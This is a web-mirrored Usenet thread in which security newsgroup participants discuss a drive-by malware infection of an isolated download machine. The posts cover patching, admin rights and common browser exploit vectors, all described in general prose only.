win32.pinfi - Page 2

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View

Re: win32.pinfi`



"Leythos" wrote:

Quoted text here. Click to load it

Can you provide a google link or similar to that article?

I'd be interested to know how a person like yourself, who no doubt has
systems fully patched, has a properly configured firewall, does not
surf the web with administrator rights and does not run executable
content offered could be affected.

Was this a zero-day exploit of some kind?



Re: win32.pinfi`

Ant wrote:
Quoted text here. Click to load it

Well put, as a rhetorical expose of the disingenuous claims of such a seasoned
cyber citizen, shows the reason some wankers rightly think they need real time
protection.

Re: win32.pinfi`



not@home.today says...
Quoted text here. Click to load it

Do a google groups search - I posted it to Usenet in several security
groups.

The computer in question was setup for the sole purpose of downloading
files from the web, the account was a local admin, the firewall
permitted all file types to be accessed in HTTP/FTP, but it was isolated
from the rest of the network.

The computer was fully patched, running XP Prof SP3 and all updates,
SEPP latest version and fully updated, and I was using the latest
FireFox browser at the time.

If I had blocked exe/com/dll/etc  it would not have happened, same if
the machine was not setup as a local admin (like the rest of our
computers).

We set this machine up with the idea that IT WOULD be compromised at
some point, that's why it was isolated, but in years (not the same
physical computer) it never happened.

The interesting thing is that I've seen several other computers,
residential systems, compromised with what appears to be the same crap.

--
You can't trust your best friends, your five senses, only the little
voice inside you that most civilians don't even hear -- Listen to that.  
Trust yourself.
spam999free@rrohio.com (remove 999 for proper email address)

Re: win32.pinfi`



"Leythos" wrote:

Quoted text here. Click to load it

The article title or a group name would have helped, but someone
kindly sent me a link.

http://groups.google.com/group/microsoft.public.windowsxp.security_admin/msg/5a7d07766b150feb?hl=en

Quoted text here. Click to load it

Ok. Nothing wrong with being able to download potentially dangerous
files but running them is another matter.

Quoted text here. Click to load it

Seems like FireFox could be the problem.

Quoted text here. Click to load it

Ok.

I've read the article and it appears the user did not deliberately
download and run something but simply visited a bad site causing
FireFox or one of its plugins to run an executable. Since the browser
was up-to-date and presumably configured properly, this indicates a
new or recently discovered but unpatched bug.

Typically, malicious sites attempt to run Javascript which does
several of the following:

* Allocate huge blocks of memory, filling with nop slides and
shellcode in preparation for exploiting a buggy browser component.
The exploit corrupts the process or thread stack and the CPU
instruction pointer ends up in the prepared memory. The attackers
code is now in control. I believe Data Execution Prevention (DEP) is
supposed to prevent this happening.

* Attempt to exploit many different ActiveX controls which are known
to be vulnerable or unsafe. They can be standard Microsoft components
or so-called browser helper objects like toolbars and seach
assistants from other software vendors. Not usually an issue with
Mozilla browsers which don't understand ActiveX controls, although
I've heard of a plugin that can enable access to them.

* Load malformed PDF and SWF (Flash) documents which also contain
shellcode and exploits for buggy Adobe components. Sometimes these
are targetted at other document readers like FoxIt.

* Run Java applets which exploit buggy versions of Sun's JVM.

* Exploit other controls, components, plugins or DOM peculiarities
specific to FireFox or other browsers.

I think that just about covers the current range of possibilities for
browsers. Other than that, the user would have to deliberately run an
executable.

Quoted text here. Click to load it

Bogus security/AV software is widespread.



Re: win32.pinfi`



Ant wrote:
Quoted text here. Click to load it

Didn't Foxit fix that vulnerability back last summer
with v3.0 b1817? http://tinyurl.com/yeseu8t

Re: win32.pinfi`



"ASCII" wrote:

Quoted text here. Click to load it

Yes, but people think that by using alternative software they are
immune from attack. Exploit writers are wise to this, so whatever
browser and associated applications are used as helpers to display
documents/multimedia, it's important to keep them up-to-date.



Re: win32.pinfi


| "ASCII" wrote:

Quoted text here. Click to load it


| Yes, but people think that by using alternative software they are
| immune from attack. Exploit writers are wise to this, so whatever
| browser and associated applications are used as helpers to display
| documents/multimedia, it's important to keep them up-to-date.


Actually, there was another vendor independent PDF vulnerability the US CERT
identified
(APSB09-15) in October that was patched by FoxIt v3.1.2.xxxx

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp



Re: win32.pinfi`




Quoted text here. Click to load it

Murphy sez:

Updating to the latest and greatest wil add new and currently unknown
vulnerabilities.

Art :)

Re: win32.pinfi`



"Art" wrote:

Quoted text here. Click to load it

The more complex systems become, the more bugs they have and the more
opportunities there are for exploits. That's why my browser is wget on
Windows 2000! Well, not all the time but a lot of malware will now
only run on later versions of XP and above. Some of it requires recent
versions of the VC++ runtime libraries, newer API functions in the
core OS and some uses dot-NET. I don't have that stuff on my internet-
connected PC.

My system wouldn't suit a modern-day web user; it's too minimalist and
doesn't have the latest gizmos. Apps I use most are a command prompt
and a text editor!



Re: win32.pinfi`



not@home.today says...
Quoted text here. Click to load it

Yep, but as I mentioned, I didn't click on anything, it was a browser
redirect and nothing was downloaded/clicked.

--
You can't trust your best friends, your five senses, only the little
voice inside you that most civilians don't even hear -- Listen to that.  
Trust yourself.
spam999free@rrohio.com (remove 999 for proper email address)

Re: win32.pinfi`



"Leythos" wrote:

Quoted text here. Click to load it

However, executables were downloaded (or injected into memory) and
run, albeit automatically by the browser, thereby indicating a
problem with that software. At least, one presumes that was the case
and there wasn't some vulnerable MS service accepting malicious
requests on, say port 445 coincidentally at the same time.



Re: win32.pinfi`



not@home.today says...
Quoted text here. Click to load it

There is no port 445 access on that network, only FTP, HTTP, HTTPS, DNS
on that network.

--
You can't trust your best friends, your five senses, only the little
voice inside you that most civilians don't even hear -- Listen to that.  
Trust yourself.
spam999free@rrohio.com (remove 999 for proper email address)

Re: win32.pinfi`



Leythos wrote:
Quoted text here. Click to load it

...learned how to configure a safe web interface (browser) such that one could
surf without fear, regardless of the site.

Re: win32.pinfi`



Quoted text here. Click to load it

You seem to have missed the article like Butts did - it was a
sacrificial machine with the sole purpose of downloading files.

--
You can't trust your best friends, your five senses, only the little
voice inside you that most civilians don't even hear -- Listen to that.  
Trust yourself.
spam999free@rrohio.com (remove 999 for proper email address)

Re: win32.pinfi`



Quoted text here. Click to load it

It is well known that downloading program files from the web can
potentially lead to malware problems. What interests me more (and from a
detection point of view) is how the initial lure gets to be displayed to
a user. Obfuscated HTML and/or script (I'm sure scripting was also
enabled and unrestricted) can be detected as suspicious (Avira may show
a heuristic detection of these) and 'nipped it in the bud'. This is
*not* the same as detecting the actual (various) malware being served
up. Does your goat log these lure attempts, and did the endpoint
protection slip up, or was it a new obfuscation technique it wasn't yet
equipped to handle? Are your downloads unattended, or is the user
required to say "yes" to whatever oddball rogue requests a click from
them?

I assume this was a goat network rather than a regular network that you
set up on "opposite day". :o)



Re: win32.pinfi`



erratic@nomail.afraid.org says...
Quoted text here. Click to load it

We have one machine we setup to download from the net, it's a machine
that has no access to our other machines by network connection and
firewall rules - the purpose is to download files, it's not a honeypot,
it's just a safe way of doing downloads.

In this case I was attempting to browse to a MS site and entered the
address incorrectly and was taken to a non-MS site and immediately
redirected to the malicious site.

SEPP didn't show anything at the time of entry or during the additional
items the malware downloaded, and the firewall was not setup to monitor
intrusions on that network/machine.

In this case there was no manual anything, as soon as the page started
to load the tattle-tale DOS box appeared and then closed, doing this
several times in a few seconds - as each new malware was loaded.

The reason I posted the events/information was to make people aware of
just how easy, even if you're using a NAT router, it is to get
compromised by accident, using all updates/patches, using commercial
antimalware tools, etc.... In all my years I've never had that happen,
but we don't normally allow that level of access on our networks or
customers networks - this machine was isolated and for good reason.

The point was that with a few simple protection methods, based on how I
believe the infection entered, it could have been prevented, something
that most people are not willing to do because of the limits it puts on
them while using their computers.

--
You can't trust your best friends, your five senses, only the little
voice inside you that most civilians don't even hear -- Listen to that.  
Trust yourself.
spam999free@rrohio.com (remove 999 for proper email address)

Re: win32.pinfi`



Quoted text here. Click to load it

Common typo squatters!

Quoted text here. Click to load it

Browser exploit webpage must have had something that worked on your
setup.

Quoted text here. Click to load it

Why do you run this special isolated machine as admin?

Quoted text here. Click to load it

Compartmentalization is the essence of what the term "firewall" used to
be all about.

Quoted text here. Click to load it

You mean - like not running as admin when you don't need to?



Re: win32.pinfi`



erratic@nomail.afraid.org says...
Quoted text here. Click to load it

Because it's used for specific functions and the machine is setup for
access to sites that MIGHT compromise it.

You guys seem to miss that this is a sacrificial machine, just for
downloads on the net.

--
You can't trust your best friends, your five senses, only the little
voice inside you that most civilians don't even hear -- Listen to that.  
Trust yourself.
spam999free@rrohio.com (remove 999 for proper email address)

Re: win32.pinfi`




Quoted text here. Click to load it

No, I got that part.

What you seem to miss is that offering up your sacrifice of computing
power to possible nefarious activities affects us and not just you.



Re: win32.pinfi`



erratic@nomail.afraid.org says...
Quoted text here. Click to load it

Then you did miss the information in the description - there was NO
OFFERING and it WASN'T ONLINE FOR MORE THAN 10 SECONDS once compromised.

Sheesh, are you trying to be confrontational or what?

--
You can't trust your best friends, your five senses, only the little
voice inside you that most civilians don't even hear -- Listen to that.  
Trust yourself.
spam999free@rrohio.com (remove 999 for proper email address)

Site Timeline